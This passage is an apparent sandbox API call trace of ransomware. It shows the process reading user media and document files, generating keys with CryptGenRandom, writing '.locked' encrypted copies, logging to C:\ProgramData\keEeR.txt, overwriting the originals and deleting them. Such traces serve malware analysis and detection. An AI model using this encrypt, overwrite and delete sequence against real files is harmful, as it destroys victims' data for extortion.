[0308.737] WriteFile (in: hFile=0x1e0, lpBuffer=0x12380340*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x123a3e64, lpOverlapped=0x0 | out: lpBuffer=0x12380340*, lpNumberOfBytesWritten=0x123a3e64*=0x3f, lpOverlapped=0x0) returned 1 [0309.103] SetEvent (hEvent=0x150) returned 1 [0309.103] CloseHandle (hObject=0x1e0) returned 1 [0309.329] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\rABuPsLDVO2opjc 4TTO.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\rabupsldvo2opjc 4tto.pptx")) returned 1 [0309.409] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0309.496] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x0 [0309.498] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33e2fb30, ulCount=0x10, ulNumEntriesRemoved=0x33e2fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33e2fb30, ulNumEntriesRemoved=0x33e2fb10) returned 0 [0309.498] SetEvent (hEvent=0x150) returned 1 [0309.498] SetEvent (hEvent=0x14c) returned 1 [0309.498] SetEvent (hEvent=0x214) returned 1 [0309.498] SetEvent (hEvent=0x134) returned 1 [0309.502] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x102 [0309.515] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0309.515] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x102 [0309.527] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0309.527] SetEvent (hEvent=0x190) returned 1 [0309.527] SetEvent (hEvent=0x1b8) returned 1 [0309.527] SetEvent (hEvent=0x104) returned 1 [0309.527] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0309.527] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33e2fb34, ulCount=0x10, ulNumEntriesRemoved=0x33e2fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33e2fb34, ulNumEntriesRemoved=0x33e2fb14) returned 0 [0309.527] SetEvent (hEvent=0x150) returned 1 [0309.527] SetEvent (hEvent=0x1b8) returned 1 [0309.528] SetEvent (hEvent=0x104) returned 1 [0309.528] SetEvent (hEvent=0x190) returned 1 [0309.538] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x0 [0309.539] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33e2fb30, ulCount=0x10, ulNumEntriesRemoved=0x33e2fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33e2fb30, ulNumEntriesRemoved=0x33e2fb10) returned 0 [0309.539] SetEvent (hEvent=0x104) returned 1 [0309.539] SetEvent (hEvent=0x190) returned 1 [0309.539] SetEvent (hEvent=0x1b8) returned 1 [0309.540] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x0 [0309.541] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x0 [0309.542] SetEvent (hEvent=0x1ac) returned 1 [0309.542] SetEvent (hEvent=0x220) returned 1 [0309.542] SetEvent (hEvent=0x20c) returned 1 [0309.542] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0309.542] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33e2fb34, ulCount=0x10, ulNumEntriesRemoved=0x33e2fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33e2fb34, ulNumEntriesRemoved=0x33e2fb14) returned 0 [0309.542] SetEvent (hEvent=0x150) returned 1 [0309.542] SetEvent (hEvent=0x20c) returned 1 [0309.542] SetEvent (hEvent=0x220) returned 1 [0309.543] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\rABuPsLDVO2opjc 4TTO.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\rabupsldvo2opjc 4tto.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0309.553] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0309.618] SetEvent (hEvent=0x150) returned 1 [0309.618] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x125e1e88 | out: lpMode=0x125e1e88) returned 0 [0309.618] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0309.652] SetEvent (hEvent=0x190) returned 1 [0309.652] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0309.712] SetEvent (hEvent=0x1ac) returned 1 [0309.712] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0309.872] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0310.114] SetEvent (hEvent=0x190) returned 1 [0310.114] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0310.162] SetEvent (hEvent=0x220) returned 1 [0310.162] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0310.166] SetEvent (hEvent=0x134) returned 1 [0310.166] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0310.313] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0310.313] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x125dee94 | out: lpMode=0x125dee94) returned 0 [0310.314] WriteFile (in: hFile=0x1b0, lpBuffer=0x125ec140*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x125dee64, lpOverlapped=0x0 | out: lpBuffer=0x125ec140*, lpNumberOfBytesWritten=0x125dee64*=0x4f, lpOverlapped=0x0) returned 1 [0310.314] CloseHandle (hObject=0x1b0) returned 1 [0310.314] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\IcIyvO_b9I-.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\iciyvo_b9i-.wav")) returned 1 [0310.347] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\IcIyvO_b9I-.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\iciyvo_b9i-.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0310.632] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0310.768] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x125dee88 | out: lpMode=0x125dee88) returned 0 [0310.768] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0310.788] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0310.793] SetEvent (hEvent=0x12c) returned 1 [0310.793] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x102 [0310.835] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0310.835] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x102 [0310.855] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0310.855] SetEvent (hEvent=0x21c) returned 1 [0310.855] SetEvent (hEvent=0x190) returned 1 [0310.855] SetEvent (hEvent=0x184) returned 1 [0310.855] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0310.857] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33e2fb34, ulCount=0x10, ulNumEntriesRemoved=0x33e2fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33e2fb34, ulNumEntriesRemoved=0x33e2fb14) returned 0 [0310.857] SetEvent (hEvent=0x150) returned 1 [0310.857] SetEvent (hEvent=0x184) returned 1 [0310.857] SetEvent (hEvent=0x190) returned 1 [0310.857] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e1a24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x125e1a24*=0xc) returned 1 [0310.879] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0311.108] SetEvent (hEvent=0x214) returned 1 [0311.108] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0311.108] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0311.111] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e020*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1239da24, lpReserved=0x0 | out: lpBuffer=0x1263e020*, lpNumberOfCharsWritten=0x1239da24*=0xc) returned 1 [0311.151] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\w158lXmEu7fV\\B03VQSoNR.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\w158lxmeu7fv\\b03vqsonr.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0311.152] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x1239dd9c | out: lpMode=0x1239dd9c) returned 0 [0311.152] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\w158lXmEu7fV\\B03VQSoNR.wav.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\w158lxmeu7fv\\b03vqsonr.wav.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0311.153] GetConsoleMode (in: hConsoleHandle=0x228, lpMode=0x1239dd9c | out: lpMode=0x1239dd9c) returned 0 [0311.153] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e040 | out: pbBuffer=0x1263e040) returned 1 [0311.153] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8020 | out: pbBuffer=0x124a8020) returned 1 [0311.153] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0311.153] WriteFile (in: hFile=0x228, lpBuffer=0x12681000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239dd78, lpOverlapped=0x0 | out: lpBuffer=0x12681000*, lpNumberOfBytesWritten=0x1239dd78*=0x80, lpOverlapped=0x0) returned 1 [0311.190] ReadFile (in: hFile=0x1bc, lpBuffer=0x16c0a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x16c0a000*, lpNumberOfBytesRead=0x1239dd68*=0xb226, lpOverlapped=0x0) returned 1 [0311.192] WriteFile (in: hFile=0x228, lpBuffer=0x16c0a000*, nNumberOfBytesToWrite=0xb226, lpNumberOfBytesWritten=0x1239dd74, lpOverlapped=0x0 | out: lpBuffer=0x16c0a000*, lpNumberOfBytesWritten=0x1239dd74*=0xb226, lpOverlapped=0x0) returned 1 [0311.233] ReadFile (in: hFile=0x1bc, lpBuffer=0x16c0a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x16c0a000*, lpNumberOfBytesRead=0x1239dd68*=0x0, lpOverlapped=0x0) returned 1 [0311.233] CloseHandle (hObject=0x228) returned 1 [0311.233] CloseHandle (hObject=0x1bc) returned 1 [0311.234] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0311.234] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x1239de94 | out: lpMode=0x1239de94) returned 0 [0311.234] WriteFile (in: hFile=0x1bc, lpBuffer=0x126ae240*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x1239de64, lpOverlapped=0x0 | out: lpBuffer=0x126ae240*, lpNumberOfBytesWritten=0x1239de64*=0x55, lpOverlapped=0x0) returned 1 [0311.234] CloseHandle (hObject=0x1bc) returned 1 [0311.234] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\w158lXmEu7fV\\B03VQSoNR.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\w158lxmeu7fv\\b03vqsonr.wav")) returned 1 [0311.472] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0311.642] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\w158lXmEu7fV\\B03VQSoNR.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\w158lxmeu7fv\\b03vqsonr.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0311.691] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0312.411] SetEvent (hEvent=0x150) returned 1 [0312.412] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x1239de88 | out: lpMode=0x1239de88) returned 0 [0312.412] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0312.448] WriteFile (in: hFile=0x230, lpBuffer=0x1286a000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1239de78, lpOverlapped=0x0 | out: lpBuffer=0x1286a000*, lpNumberOfBytesWritten=0x1239de78*=0xfa000, lpOverlapped=0x0) returned 1 [0312.477] CloseHandle (hObject=0x230) returned 1 [0312.477] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\w158lXmEu7fV\\B03VQSoNR.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\w158lxmeu7fv\\b03vqsonr.wav")) returned 1 [0312.492] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0312.547] SetEvent (hEvent=0x220) returned 1 [0312.547] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0312.550] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0312.552] SetEvent (hEvent=0x1f0) returned 1 [0312.552] SetEvent (hEvent=0x12c) returned 1 [0312.552] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0312.657] SetEvent (hEvent=0x14c) returned 1 [0312.657] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x102 [0312.715] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0312.715] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x102 [0312.721] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0312.721] SetEvent (hEvent=0x22c) returned 1 [0312.721] SetEvent (hEvent=0x1b8) returned 1 [0312.721] SetEvent (hEvent=0x184) returned 1 [0312.721] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0312.721] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33e2fb34, ulCount=0x10, ulNumEntriesRemoved=0x33e2fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33e2fb34, ulNumEntriesRemoved=0x33e2fb14) returned 0 [0312.721] SetEvent (hEvent=0x150) returned 1 [0312.721] SetEvent (hEvent=0x1b8) returned 1 [0312.721] SetEvent (hEvent=0x184) returned 1 [0312.721] SetEvent (hEvent=0x22c) returned 1 [0312.721] SetEvent (hEvent=0x20c) returned 1 [0312.721] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0312.840] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0312.851] SetEvent (hEvent=0x220) returned 1 [0312.851] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0313.183] SetEvent (hEvent=0x220) returned 1 [0313.183] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0313.236] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\rmbfWOcSo8.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\rmbfwocso8.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0313.446] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0313.503] SetEvent (hEvent=0x20c) returned 1 [0313.503] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1276be88 | out: lpMode=0x1276be88) returned 0 [0313.503] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0313.557] WriteFile (in: hFile=0x1e0, lpBuffer=0x14900000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276be78, lpOverlapped=0x0 | out: lpBuffer=0x14900000*, lpNumberOfBytesWritten=0x1276be78*=0xfa000, lpOverlapped=0x0) returned 1 [0313.586] CloseHandle (hObject=0x1e0) returned 1 [0313.586] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\rmbfWOcSo8.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\rmbfwocso8.wav")) returned 1 [0313.656] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0313.658] SetEvent (hEvent=0x184) returned 1 [0313.658] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0313.662] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0313.687] SetEvent (hEvent=0x184) returned 1 [0313.687] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0313.699] SetEvent (hEvent=0x1b8) returned 1 [0313.699] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0313.935] SetEvent (hEvent=0x214) returned 1 [0313.935] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0313.957] SetEvent (hEvent=0x214) returned 1 [0313.957] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0313.958] SetEvent (hEvent=0x214) returned 1 [0313.958] SetEvent (hEvent=0x1b8) returned 1 [0313.958] SetEvent (hEvent=0x12c) returned 1 [0313.958] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0313.962] SetEvent (hEvent=0x214) returned 1 [0313.962] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0313.964] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e1a24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x125e1a24*=0xc) returned 1 [0314.000] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\3rTk3Jmbl9H.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u\\3rtk3jmbl9h.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0314.000] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x125e1d9c | out: lpMode=0x125e1d9c) returned 0 [0314.000] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\3rTk3Jmbl9H.gif.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u\\3rtk3jmbl9h.gif.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0314.001] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x125e1d9c | out: lpMode=0x125e1d9c) returned 0 [0314.001] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e020 | out: pbBuffer=0x1263e020) returned 1 [0314.001] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8020 | out: pbBuffer=0x124a8020) returned 1 [0314.001] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714381 | out: pbBuffer=0x12714381) returned 1 [0314.002] WriteFile (in: hFile=0x1e0, lpBuffer=0x126c7000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e1d78, lpOverlapped=0x0 | out: lpBuffer=0x126c7000*, lpNumberOfBytesWritten=0x125e1d78*=0x80, lpOverlapped=0x0) returned 1 [0314.004] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x0 [0314.023] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33e2fb30, ulCount=0x10, ulNumEntriesRemoved=0x33e2fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33e2fb30, ulNumEntriesRemoved=0x33e2fb10) returned 0 [0314.023] SetEvent (hEvent=0x150) returned 1 [0314.024] SetEvent (hEvent=0x190) returned 1 [0314.024] SetEvent (hEvent=0x12c) returned 1 [0314.024] SetEvent (hEvent=0x20c) returned 1 [0314.024] ReadFile (in: hFile=0x1c0, lpBuffer=0x12ba2000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e1d68, lpOverlapped=0x0 | out: lpBuffer=0x12ba2000*, lpNumberOfBytesRead=0x125e1d68*=0xa873, lpOverlapped=0x0) returned 1 [0314.026] WriteFile (in: hFile=0x1e0, lpBuffer=0x12ba2000*, nNumberOfBytesToWrite=0xa873, lpNumberOfBytesWritten=0x125e1d74, lpOverlapped=0x0 | out: lpBuffer=0x12ba2000*, lpNumberOfBytesWritten=0x125e1d74*=0xa873, lpOverlapped=0x0) returned 1 [0314.040] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0314.137] ReadFile (in: hFile=0x1c0, lpBuffer=0x12ba2000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e1d68, lpOverlapped=0x0 | out: lpBuffer=0x12ba2000*, lpNumberOfBytesRead=0x125e1d68*=0x0, lpOverlapped=0x0) returned 1 [0314.137] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0314.326] SetEvent (hEvent=0x150) returned 1 [0314.326] SetEvent (hEvent=0x214) returned 1 [0314.326] CloseHandle (hObject=0x1e0) returned 1 [0314.327] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0314.382] SetEvent (hEvent=0x150) returned 1 [0314.382] CloseHandle (hObject=0x1c0) returned 1 [0314.383] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0314.417] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0314.417] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x125e1e94 | out: lpMode=0x125e1e94) returned 0 [0314.417] WriteFile (in: hFile=0x1e0, lpBuffer=0x12714380*, nNumberOfBytesToWrite=0x75, lpNumberOfBytesWritten=0x125e1e64, lpOverlapped=0x0 | out: lpBuffer=0x12714380*, lpNumberOfBytesWritten=0x125e1e64*=0x75, lpOverlapped=0x0) returned 1 [0314.418] CloseHandle (hObject=0x1e0) returned 1 [0314.418] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\3rTk3Jmbl9H.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u\\3rtk3jmbl9h.gif")) returned 1 [0314.522] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\3rTk3Jmbl9H.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u\\3rtk3jmbl9h.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0314.538] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0314.637] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x125e1e88 | out: lpMode=0x125e1e88) returned 0 [0314.637] WriteFile (in: hFile=0x19c, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e1e78, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x125e1e78*=0xfa000, lpOverlapped=0x0) returned 1 [0314.663] CloseHandle (hObject=0x19c) returned 1 [0314.663] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\3rTk3Jmbl9H.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u\\3rtk3jmbl9h.gif")) returned 1 [0314.683] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0314.774] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e1a24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x125e1a24*=0xc) returned 1 [0314.780] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0314.827] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0314.828] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0314.830] SetEvent (hEvent=0x220) returned 1 [0314.830] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0314.906] SetEvent (hEvent=0x22c) returned 1 [0314.906] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x102 [0314.941] WaitForSingleObject (hHandle=0x1e8, 